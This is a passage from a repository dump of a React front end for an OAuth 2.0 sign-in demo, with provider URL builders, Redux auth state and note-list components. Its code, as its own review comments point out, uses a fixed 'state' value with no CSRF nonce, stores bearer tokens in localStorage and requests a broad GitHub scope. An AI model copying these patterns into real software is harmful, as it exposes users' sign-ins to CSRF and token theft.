( 14 | 15 | ) : ( 16 | 17 | ) 18 | } 19 | 20 | export default RoutePrivate 21 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/note/List/style.css: -------------------------------------------------------------------------------- 1 | .note-list { 2 | display: flex; 3 | flex-direction: column; 4 | flex: 1; 5 | max-width: 30rem; 6 | } 7 | 8 | .note-list > form { 9 | display: flex; 10 | flex-direction: column; 11 | background-color: var(--grey-light); 12 | padding: 1rem; 13 | } 14 | 15 | .note-list > aside { 16 | margin-top: 2rem; 17 | } 18 | 19 | .note-list > aside > .list { 20 | display: flex; 21 | flex-direction: column; 22 | margin-top: 0.5rem; 23 | } 24 | 25 | .note-list > aside > .list > .item { 26 | display: flex; 27 | flex-direction: column; 28 | border-bottom: 1px solid var(--grey); 29 | padding: 0.5rem 0; 30 | } 31 | .note-list > aside > .list > .item:last-child { 32 | border: none; 33 | } 34 | .note-list > aside > .list > .item > .info { 35 | font-size: 0.8rem; 36 | margin-top: 0.25rem; 37 | color: var(--grey-dark); 38 | } 39 | .note-list > aside > .list > .item > .info > span { 40 | cursor: pointer; 41 | } 42 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/note/api/actions/mutation/index.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import save from './save' 3 | import remove from './remove' 4 | 5 | // Queries 6 | export { save, remove } 7 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/note/api/actions/mutation/remove.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App Imports 5 | import { URL_API } from 
'setup/config/env' 6 | 7 | // Remove 8 | export default function remove({ noteId }) { 9 | return axios.post(URL_API, { 10 | operation: 'noteRemove', 11 | params: { noteId }, 12 | }) 13 | } 14 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/note/api/actions/mutation/save.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App Imports 5 | import { URL_API } from 'setup/config/env' 6 | 7 | // Save 8 | export default function save(note) { 9 | return axios.post(URL_API, { 10 | operation: 'noteSave', 11 | params: note, 12 | }) 13 | } 14 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/note/api/actions/query/index.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import list from './list' 3 | 4 | // Queries 5 | export { list } 6 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/note/api/actions/query/list.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App Imports 5 | import { URL_API } from 'setup/config/env' 6 | 7 | // Get list 8 | export default function list() { 9 | return axios.post(URL_API, { 10 | operation: 'noteList', 11 | }) 12 | } 13 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/pages/Authorize/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React, { useEffect } from 'react' 3 | import { Helmet } from 'react-helmet' 4 | import { useDispatch } from 
'react-redux' 5 | import * as queryString from 'query-string' 6 | 7 | // UI imports 8 | import './style.css' 9 | 10 | // App imports 11 | import { URL_WEB } from 'setup/config/env' 12 | import params from 'setup/config/params' 13 | import routes from 'setup/routes' 14 | import { 15 | loginSetUser, 16 | loginSetUserLocalStorage, 17 | } from 'modules/user/api/actions/query' 18 | import { authorize } from 'modules/user/api/actions/mutation' 19 | 20 | // Component 21 | const Authorize = ({ history, location }) => { 22 | // state 23 | const dispatch = useDispatch() 24 | 25 | // on load 26 | useEffect(() => { 27 | process() 28 | }, []) 29 | 30 | // process 31 | const process = async () => { 32 | const query = queryString.parse(location.search) 33 | 34 | if (query.code && query.state) { 35 | let redirectTo = routes.pagesHome.path 36 | 37 | try { 38 | const { data } = await authorize(query) 39 | 40 | if (data && data.success && data.data) { 41 | const token = data.data.token 42 | const user = data.data.user 43 | 44 | dispatch(loginSetUser(token, user)) 45 | 46 | loginSetUserLocalStorage(token, user) 47 | 48 | redirectTo = routes.userDashboard.path 49 | } 50 | } catch (error) { 51 | // console.log(error) 52 | } finally { 53 | history.push(redirectTo) 54 | } 55 | } else { 56 | history.push(routes.pagesHome.path) 57 | } 58 | } 59 | 60 | // render 61 | return ( 62 | <> 63 | {/* meta */} 64 | 65 | {`Authorizing... · ${params.site.name}`} 66 | 67 | 68 | {/* content */} 69 |
70 |

71 | loading...{' '} 72 | Authorizing... 73 |

74 |
75 | 76 | ) 77 | } 78 | 79 | export default Authorize 80 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/pages/Authorize/style.css: -------------------------------------------------------------------------------- 1 | .pages-authorize { 2 | display: flex; 3 | flex-direction: row; 4 | } 5 | 6 | .pages-authorize > p { 7 | display: flex; 8 | justify-content: center; 9 | align-items: center; 10 | color: var(--grey-dark); 11 | } 12 | .pages-authorize > p > img { 13 | margin-right: 0.5rem; 14 | } 15 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/pages/Home/style.css: -------------------------------------------------------------------------------- 1 | .pages-home { 2 | display: flex; 3 | flex-direction: column; 4 | flex: 1; 5 | } 6 | 7 | .pages-home > .group { 8 | display: flex; 9 | flex-direction: row; 10 | margin-top: 1rem; 11 | } 12 | .pages-home > .group > section { 13 | display: flex; 14 | flex-direction: column; 15 | margin-right: 1rem; 16 | width: 12rem; 17 | } 18 | 19 | .pages-home > .group > section > h4 { 20 | margin-bottom: 1rem; 21 | } 22 | .pages-home > .group > section > a { 23 | display: block; 24 | margin-bottom: 1rem; 25 | } 26 | .pages-home > .group > section > a > button { 27 | width: 100%; 28 | } 29 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/Dashboard/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | import { Helmet } from 'react-helmet' 4 | import { useSelector } from 'react-redux' 5 | 6 | // UI imports 7 | import './style.css' 8 | 9 | // App imports 10 | import params from 'setup/config/params' 11 | 12 | // Component 13 | const Dashboard = () => { 14 | 
// state 15 | const { user } = useSelector((state) => state.auth) 16 | 17 | // render 18 | return ( 19 | <> 20 | {/* meta */} 21 | 22 | {`User Dashboard · ${params.site.name}`} 23 | 24 | 25 | {/* content */} 26 |
27 |

Welcome, {user && user.name}!

28 |
29 | 30 | ) 31 | } 32 | 33 | export default Dashboard 34 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/Dashboard/style.css: -------------------------------------------------------------------------------- 1 | .user-dashboard { 2 | display: flex; 3 | flex-direction: column; 4 | flex: 1; 5 | } 6 | 7 | .user-dashboard > aside { 8 | margin-top: 1rem; 9 | } 10 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/Profile/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React, { useState, useEffect } from 'react' 3 | import { Helmet } from 'react-helmet' 4 | import { useDispatch } from 'react-redux' 5 | import moment from 'moment' 6 | 7 | // UI imports 8 | import Button from 'ui/Button' 9 | import './style.css' 10 | 11 | // App imports 12 | import params from 'setup/config/params' 13 | import { logout, profile } from 'modules/user/api/actions/query' 14 | 15 | // Component 16 | const Dashboard = () => { 17 | // state 18 | const [isLoading, isLoadingToggle] = useState(false) 19 | const [user, setUser] = useState(null) 20 | const dispatch = useDispatch() 21 | 22 | // on load 23 | useEffect(() => { 24 | refresh() 25 | }, []) 26 | 27 | // refresh 28 | const refresh = async () => { 29 | isLoadingToggle(true) 30 | 31 | try { 32 | const { data } = await profile() 33 | 34 | if (data.success && data.data) { 35 | setUser(data.data) 36 | } 37 | } catch (error) { 38 | console.log(error) 39 | } finally { 40 | isLoadingToggle(false) 41 | } 42 | } 43 | 44 | // on logout 45 | const onLogout = () => { 46 | let check = window.confirm('Are you sure you want to logout?') 47 | 48 | if (check) { 49 | dispatch(logout()) 50 | } 51 | } 52 | 53 | // render 54 | return ( 55 | <> 56 | {/* meta */} 57 | 58 | {`User Dashboard · 
${params.site.name}`} 59 | 60 | 61 | {/* content */} 62 |
63 | {isLoading ? ( 64 |

Loading profile...

65 | ) : ( 66 | user && ( 67 | <> 68 |

69 | Name: {user.name} 70 |

71 |

72 | Email: {user.email} 73 |

74 |

75 | Registered:{' '} 76 | {moment(user.createdAt).format(params.common.date)} 77 |

78 | 79 | ) 80 | )} 81 | 82 | 85 |
86 | 87 | ) 88 | } 89 | 90 | export default Dashboard 91 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/Profile/style.css: -------------------------------------------------------------------------------- 1 | .user-dashboard { 2 | display: flex; 3 | flex-direction: column; 4 | flex: 1; 5 | } 6 | 7 | .user-dashboard > p { 8 | margin-bottom: 0.5rem; 9 | } 10 | 11 | .user-dashboard > aside { 12 | margin-top: 1rem; 13 | } 14 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/mutation/authorize.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { URL_API } from 'setup/config/env' 6 | 7 | // Authorize 8 | export default function authorize(query) { 9 | return axios.post(URL_API, { 10 | operation: 'userAuthorize', 11 | params: query, 12 | }) 13 | } 14 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/mutation/index.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import authorize from './authorize' 3 | 4 | // Queries 5 | export { authorize } 6 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/query/index.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import loginSetUser from './loginSetUser' 3 | import loginSetUserLocalStorage from './loginSetUserLocalStorage' 4 | import logout from './logout' 5 | import logoutUnsetUserLocalStorage from './logoutUnsetUserLocalStorage' 6 | import profile from 
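'./profile'

// Queries
export {
  loginSetUser,
  loginSetUserLocalStorage,
  logout,
  logoutUnsetUserLocalStorage,
  profile,
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/query/loginSetUser.js: --------------------------------------------------------------------------------
// App Imports
import { SET_USER } from 'modules/user/api/actions/types'

// Emit set user event.
// Returns a plain SET_USER action carrying `user`.
// NOTE(review): `token` is accepted but not used; persisting the token is done
// by loginSetUserLocalStorage, so passing it here alone has no effect.
export default function loginSetUser(token, user) {
  return { type: SET_USER, user }
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/query/loginSetUserLocalStorage.js: --------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// Set user token and info in localStorage and axios auth headers.
// NOTE(review): the default header set here is named `Authentication`, while
// the standard bearer header is `Authorization`; the API presumably reads the
// former — confirm against the server before renaming either side.
// A bearer token kept in localStorage is readable by any script running on the
// origin; that is the storage choice of this sample, not changed here.
export default function loginSetUserLocalStorage(token, user) {
  if (token) {
    axios.defaults.headers.common['Authentication'] = `Bearer ${token}`
  } else {
    delete axios.defaults.headers.common['Authentication']
  }

  // Update token. A missing token is removed rather than written, because
  // setItem(null/undefined) would persist the literal string "null"/"undefined",
  // which later reads would treat as a present (truthy) token.
  if (token) {
    window.localStorage.setItem('token', token)
  } else {
    window.localStorage.removeItem('token')
  }
  window.localStorage.setItem('user', JSON.stringify(user))
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/query/logout.js: --------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App Imports
import { LOGOUT } from 'modules/user/api/actions/types'
import { logoutUnsetUserLocalStorage } from 'modules/user/api/actions/query'

// Log out user and remove token from localStorage.
// Returns a thunk, so callers use dispatch(logout()).
export default function logout() {
  return (dispatch) => {
    logoutUnsetUserLocalStorage()

    // Clear the default auth header under both names: the login path sets
    // `Authentication`, while only `Authorization` was deleted before, which
    // left the stale bearer token attached to every later request.
    delete axios.defaults.headers.common['Authorization']
    delete axios.defaults.headers.common['Authentication']

    dispatch({
      type: LOGOUT,
    })

    dispatch({
      type: 'RESET',
    })

    // Clear cache. Snapshot the keys first: removing entries while enumerating
    // the live Storage object with for...in can skip keys.
    const keys = Object.keys(window.localStorage)
    for (const key of keys) {
      if (key.indexOf('CACHE.KEY/') !== -1) {
        window.localStorage.removeItem(key)
      }
    }
  }
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/query/logoutUnsetUserLocalStorage.js: --------------------------------------------------------------------------------
// Unset user token and info in localStorage.
// (Only localStorage is touched; no cookie is cleared here.)
export default function logoutUnsetUserLocalStorage() {
  // Remove token
  window.localStorage.removeItem('token')
  window.localStorage.removeItem('user')
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/query/profile.js: --------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import { URL_API } from 'setup/config/env'

// Profile
// POSTs the `userProfile` operation to the API and returns the axios promise;
// the auth header configured by loginSetUserLocalStorage rides along by default.
export default function profile() {
  return axios.post(URL_API, {
    operation: 'userProfile',
  })
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/types.js: --------------------------------------------------------------------------------
// Actions Types

// Auth
export const SET_USER = 'AUTH/SET_USER'
export const LOGOUT = 'AUTH/LOGOUT'
--------------------------------------------------------------------------------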
/oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/state/auth.js: --------------------------------------------------------------------------------
// Imports
import isEmpty from 'lodash/isEmpty'

// App Imports
import { SET_USER, LOGOUT } from '../actions/types'

// Auth (user)

// Initial State

export const authInitialState = {
  isAuthenticated: false,
  user: null,
}

// State
// Reducer for the auth slice. SET_USER stores the user and derives
// isAuthenticated from whether that user object is non-empty; LOGOUT returns
// the initial state; any other action leaves the state untouched.
export default (state = authInitialState, action) => {
  const { type } = action

  if (type === SET_USER) {
    const { user } = action
    const isAuthenticated = !isEmpty(user)

    return { ...state, user, isAuthenticated }
  }

  if (type === LOGOUT) {
    return authInitialState
  }

  return state
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/state/index.js: --------------------------------------------------------------------------------
// App Imports
import auth from './auth'

// Map of slice reducers, spread into the root reducer by the store.
export default {
  auth,
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/config/env.js: --------------------------------------------------------------------------------
// Configurations
// All values come from REACT_APP_* build-time environment variables; only
// public client ids appear here, never client secrets.

// URL
export const URL_API = process.env.REACT_APP_URL_API
export const URL_WEB = process.env.REACT_APP_URL_WEB

// Oauth
export const OAUTH_FACEBOOK_ID = process.env.REACT_APP_OAUTH_FACEBOOK_ID
export const OAUTH_GOOGLE_ID = process.env.REACT_APP_OAUTH_GOOGLE_ID
export const OAUTH_INSTAGRAM_ID = process.env.REACT_APP_OAUTH_INSTAGRAM_ID
export const OAUTH_LINKEDIN_ID = process.env.REACT_APP_OAUTH_LINKEDIN_ID
export const OAUTH_TWITTER_ID = process.env.REACT_APP_OAUTH_TWITTER_ID
export const OAUTH_REDDIT_ID =
process.env.REACT_APP_OAUTH_REDDIT_ID
export const OAUTH_DISCORD_ID = process.env.REACT_APP_OAUTH_DISCORD_ID
export const OAUTH_ZOOM_ID = process.env.REACT_APP_OAUTH_ZOOM_ID

export const OAUTH_GITHUB_ID = process.env.REACT_APP_OAUTH_GITHUB_ID
export const OAUTH_GITLAB_ID = process.env.REACT_APP_OAUTH_GITLAB_ID
export const OAUTH_DIGITALOCEAN_ID = process.env.REACT_APP_OAUTH_DIGITALOCEAN_ID
export const OAUTH_BITBUCKET_ID = process.env.REACT_APP_OAUTH_BITBUCKET_ID
export const OAUTH_AZURE_ID = process.env.REACT_APP_OAUTH_AZURE_ID
export const OAUTH_AZURE_TENANT = process.env.REACT_APP_OAUTH_AZURE_TENANT

export const OAUTH_SPOTIFY_ID = process.env.REACT_APP_OAUTH_SPOTIFY_ID
export const OAUTH_SHOPIFY_ID = process.env.REACT_APP_OAUTH_SHOPIFY_ID
export const OAUTH_SHOPIFY_STORE = process.env.REACT_APP_OAUTH_SHOPIFY_STORE
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/config/params.js: --------------------------------------------------------------------------------
// Params
// Static site metadata plus the OAuth provider table; each provider's `key`
// is what the authorization URLs send as `state`.
export default {
  site: {
    name: 'OAuth',
    description: 'OAuth 2.0 examples for various providers in one place',
    author: 'Atul Yadav',
    url: 'https://github.com/atulmy/oauth',
    copyright: '© 2020',
  },

  // common
  common: {
    date: 'YYYY-MM-DD hh:mm a',
  },

  // user
  user: {
    oauth: {
      providers: {
        facebook: {
          key: 'facebook',
          title: 'Facebook',
        },

        google: {
          key: 'google',
          title: 'Google',
        },

        instagram: {
          key: 'instagram',
          title: 'Instagram',
        },

        linkedin: {
          key: 'linkedin',
          title: 'LinkedIn',
        },

        twitter: {
          key: 'twitter',
          title: 'Twitter',
        },

        reddit: {
          key: 'reddit',
          title: 'Reddit',
        },

        discord: {
          key: 'discord',
          title: 'Discord',
        },

        zoom: {
          key: 'zoom',
          title: 'Zoom',
        },

        github: {
          key: 'github',
          title: 'Github',
        },

        gitlab: {
          key: 'gitlab',
          title: 'Gitlab',
        },

        digitalocean: {
          key: 'digitalocean',
          title: 'DigitalOcean',
        },

        bitbucket: {
          key: 'bitbucket',
          title: 'Bitbucket',
        },

        azure: {
          key: 'azure',
          title: 'Azure',
        },

        spotify: {
          key: 'spotify',
          title: 'Spotify',
        },

        shopify: {
          key: 'shopify',
          title: 'Shopify',
        },
      },
    },
  },
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/azure.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_AZURE_ID, OAUTH_AZURE_TENANT } from 'setup/config/env'
import routes from 'setup/routes'
import params from 'setup/config/params'

// azure
// Builds the Azure AD v2.0 authorization-code URL the browser is sent to.
// NOTE(review): `state` is the fixed provider key, which the callback page
// presumably uses to tell providers apart; a fixed value gives the callback no
// CSRF protection, so a per-request random value bound to the session should
// be carried alongside it (and checked on return) — confirm with the Authorize
// page before changing the format.
export default function azure() {
  const scope = [
    'offline_access',
    'openid',
    'email',
    'profile',
    'https://graph.microsoft.com/user.read',
  ].join(' ')

  const query = {
    client_id: OAUTH_AZURE_ID,
    redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`,
    response_type: 'code',
    response_mode: 'query',
    scope,
    state: params.user.oauth.providers.azure.key,
  }

  // encode:false leaves query values exactly as written (space-separated scope).
  const url = queryString.stringifyUrl(
    {
      url: `https://login.microsoftonline.com/${OAUTH_AZURE_TENANT}/oauth2/v2.0/authorize`,
      query,
    },
    { encode: false },
  )

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/bitbucket.js:
--------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { OAUTH_BITBUCKET_ID } from 'setup/config/env'
import params from 'setup/config/params'

// bitbucket
// Builds the Bitbucket authorization-code URL (no redirect_uri: Bitbucket
// uses the one registered with the consumer).
// NOTE(review): `state` is the fixed provider key, so it identifies the
// provider on the callback but does not protect the callback against CSRF.
export default function bitbucket() {
  const query = {
    client_id: OAUTH_BITBUCKET_ID,
    response_type: 'code',
    state: params.user.oauth.providers.bitbucket.key,
  }

  const url = queryString.stringifyUrl(
    { url: 'https://bitbucket.org/site/oauth2/authorize', query },
    { encode: false },
  )

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/digitalocean.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_DIGITALOCEAN_ID } from 'setup/config/env'
import routes from 'setup/routes'
import params from 'setup/config/params'

// digitalocean
// Builds the DigitalOcean authorization-code URL with read-only scope.
// NOTE(review): `state` is the fixed provider key — no per-request CSRF nonce.
export default function digitalocean() {
  const redirectUri = `${URL_WEB}${routes.pagesAuthorize.path}/`

  const query = {
    client_id: OAUTH_DIGITALOCEAN_ID,
    redirect_uri: redirectUri,
    scope: 'read',
    response_type: 'code',
    state: params.user.oauth.providers.digitalocean.key,
  }

  const url = queryString.stringifyUrl(
    { url: 'https://cloud.digitalocean.com/v1/oauth/authorize', query },
    { encode: false },
  )

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/discord.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_DISCORD_ID } from 'setup/config/env'
import routes from 'setup/routes'
import params from 'setup/config/params'

// discord
// Builds the Discord authorization-code URL requesting identity and email.
// NOTE(review): `state` is the fixed provider key — no per-request CSRF nonce.

export default function discord() {
  const redirectUri = `${URL_WEB}${routes.pagesAuthorize.path}/`

  const query = {
    client_id: OAUTH_DISCORD_ID,
    redirect_uri: redirectUri,
    response_type: 'code',
    scope: 'identify email',
    state: params.user.oauth.providers.discord.key,
  }

  const url = queryString.stringifyUrl(
    { url: 'https://discordapp.com/api/oauth2/authorize', query },
    { encode: false },
  )

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/facebook.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_FACEBOOK_ID } from 'setup/config/env'
import params from 'setup/config/params'
import routes from 'setup/routes'

// facebook
// Builds the Facebook login dialog URL (Graph API v6.0) requesting `email`.
// No response_type is sent, so Facebook's default response applies.
// NOTE(review): `state` is the fixed provider key — no per-request CSRF nonce.
export default function facebook() {
  const redirectUri = `${URL_WEB}${routes.pagesAuthorize.path}/`

  const query = {
    client_id: OAUTH_FACEBOOK_ID,
    redirect_uri: redirectUri,
    scope: `email`,
    state: params.user.oauth.providers.facebook.key,
  }

  const url = queryString.stringifyUrl(
    { url: 'https://www.facebook.com/v6.0/dialog/oauth', query },
    { encode: false },
  )

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/github.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_GITHUB_ID } from 'setup/config/env'
import routes from 'setup/routes'
import params from 'setup/config/params'

// github
// Builds the GitHub authorization-code URL.
// NOTE(review): the scope asks for `repo` (full repository access) as well as
// `read:user`; for a sign-in flow `read:user` alone is the least-privilege
// choice unless the API really needs repository access — confirm.
// `state` is the fixed provider key — no per-request CSRF nonce.
export default function github() {
  const redirectUri = `${URL_WEB}${routes.pagesAuthorize.path}/`

  const query = {
    client_id: OAUTH_GITHUB_ID,
    redirect_uri: redirectUri,
    scope: 'read:user repo',
    state: params.user.oauth.providers.github.key,
  }

  const url = queryString.stringifyUrl(
    { url: 'https://github.com/login/oauth/authorize', query },
    { encode: false },
  )

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/gitlab.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_GITLAB_ID } from 'setup/config/env'
import routes from 'setup/routes'
import params from 'setup/config/params'

// gitlab
// Builds the GitLab authorization-code URL. The scope list is joined with
// literal '+' because encoding is disabled below.
// NOTE(review): `state` is the fixed provider key — no per-request CSRF nonce.
export default function gitlab() {
  const redirectUri = `${URL_WEB}${routes.pagesAuthorize.path}/`

  const query = {
    client_id: OAUTH_GITLAB_ID,
    redirect_uri: redirectUri,
    scope: 'read_user+profile+email',
    response_type: 'code',
    state: params.user.oauth.providers.gitlab.key,
  }

  const url = queryString.stringifyUrl(
    { url: 'https://gitlab.com/oauth/authorize', query },
    { encode: false },
  )

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/google.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_GOOGLE_ID } from 'setup/config/env'
import params from 'setup/config/params'
import routes from 'setup/routes'

// google
// Builds the Google OAuth 2.0 authorization-code URL; `access_type: offline`
// plus `prompt: consent` requests a refresh token on every run.
// NOTE(review): `state` is the fixed provider key — no per-request CSRF nonce.
export default function google() {
  const redirectUri = `${URL_WEB}${routes.pagesAuthorize.path}/`
  const scope = [
    'https://www.googleapis.com/auth/userinfo.email',
    'https://www.googleapis.com/auth/userinfo.profile',
  ].join(' ')

  const query = {
    client_id: OAUTH_GOOGLE_ID,
    redirect_uri: redirectUri,
    scope,
    response_type: 'code',
    access_type: 'offline',
    prompt: 'consent',
    state: params.user.oauth.providers.google.key,
  }

  const url = queryString.stringifyUrl(
    { url: 'https://accounts.google.com/o/oauth2/v2/auth', query },
    { encode: false },
  )

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/instagram.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_INSTAGRAM_ID } from 'setup/config/env'
import params from 'setup/config/params'
import routes from 'setup/routes'

// instagram
// Builds the Instagram Basic Display authorization-code URL.
// NOTE(review): the redirect_uri currently points at example.com ("for
// testing"); the URL_WEB-based line is what a deployment needs.
// `state` is the fixed provider key — no per-request CSRF nonce.
export default function instagram() {
  const query = {
    client_id: OAUTH_INSTAGRAM_ID,
    // redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, // for live
    redirect_uri: `https://example.com${routes.pagesAuthorize.path}/`, // for testing
    scope: 'user_profile,user_media',
    response_type: 'code',
    state: params.user.oauth.providers.instagram.key,
  }

  const url = queryString.stringifyUrl(
    { url: 'https://api.instagram.com/oauth/authorize', query },
    { encode: false },
  )

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/linkedin.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_LINKEDIN_ID } from 'setup/config/env'
import routes from 'setup/routes'
import params from 'setup/config/params'

// linkedin
// Builds the LinkedIn authorization-code URL.
// NOTE(review): `state` is the fixed provider key — no per-request CSRF nonce.
export default function linkedin() {
  const redirectUri = `${URL_WEB}${routes.pagesAuthorize.path}/`
  const scope = ['r_emailaddress', 'r_liteprofile', 'w_member_social'].join(' ')

  const query = {
    client_id: OAUTH_LINKEDIN_ID,
    redirect_uri: redirectUri,
    response_type: 'code',
    scope,
    state: params.user.oauth.providers.linkedin.key,
  }

  const url = queryString.stringifyUrl(
    { url: `https://www.linkedin.com/oauth/v2/authorization`, query },
    { encode: false },
  )

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/reddit.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_REDDIT_ID } from 'setup/config/env'
import routes from 'setup/routes'
import params from 'setup/config/params'

// reddit
// Builds the Reddit authorization-code URL (temporary token, identity scope).
// NOTE(review): `state` is the fixed provider key — no per-request CSRF nonce.
export default function reddit() {
  const redirectUri = `${URL_WEB}${routes.pagesAuthorize.path}/`

  const query = {
    client_id: OAUTH_REDDIT_ID,
    redirect_uri: redirectUri,
    response_type: 'code',
    duration: 'temporary',
    scope: 'identity',
    state: params.user.oauth.providers.reddit.key,
  }

  const url = queryString.stringifyUrl(
    { url: 'https://www.reddit.com/api/v1/authorize', query },
    { encode: false },
  )

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/shopify.js:
--------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import {
  URL_WEB,
  OAUTH_SHOPIFY_ID,
  OAUTH_SHOPIFY_STORE,
} from 'setup/config/env'
import routes from 'setup/routes'
import params from 'setup/config/params'

// shopify
// Builds the Shopify admin authorization-code URL for the configured store.
// NOTE(review): `nonce` is the current timestamp and `state` is the fixed
// provider key; neither is unpredictable, so the callback gets no real
// replay/CSRF protection from them — a random per-request value checked on
// return is what these parameters are meant to carry.
export default function shopify() {
  const endpoint = `https://${OAUTH_SHOPIFY_STORE}.myshopify.com/admin/oauth/authorize`

  const query = {
    client_id: OAUTH_SHOPIFY_ID,
    redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`,
    scope: ['read_orders'].join(','),
    response_type: 'code',
    nonce: `${Date.now()}`,
    state: params.user.oauth.providers.shopify.key,
  }

  const url = queryString.stringifyUrl({ url: endpoint, query }, { encode: false })

  console.log(url)

  return url
}
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/spotify.js: --------------------------------------------------------------------------------
// Imports
import * as queryString from 'query-string'

// App imports
import { URL_WEB, OAUTH_SPOTIFY_ID } from 'setup/config/env'
import routes from 'setup/routes'
import params from 'setup/config/params'

// spotify
// Builds the Spotify authorization-code URL requesting the user's email.
// NOTE(review): `state` is the fixed provider key — no per-request CSRF nonce.
export default function spotify() {
  const endpoint = 'https://accounts.spotify.com/authorize'

  const query = {
    client_id: OAUTH_SPOTIFY_ID,
    redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`,
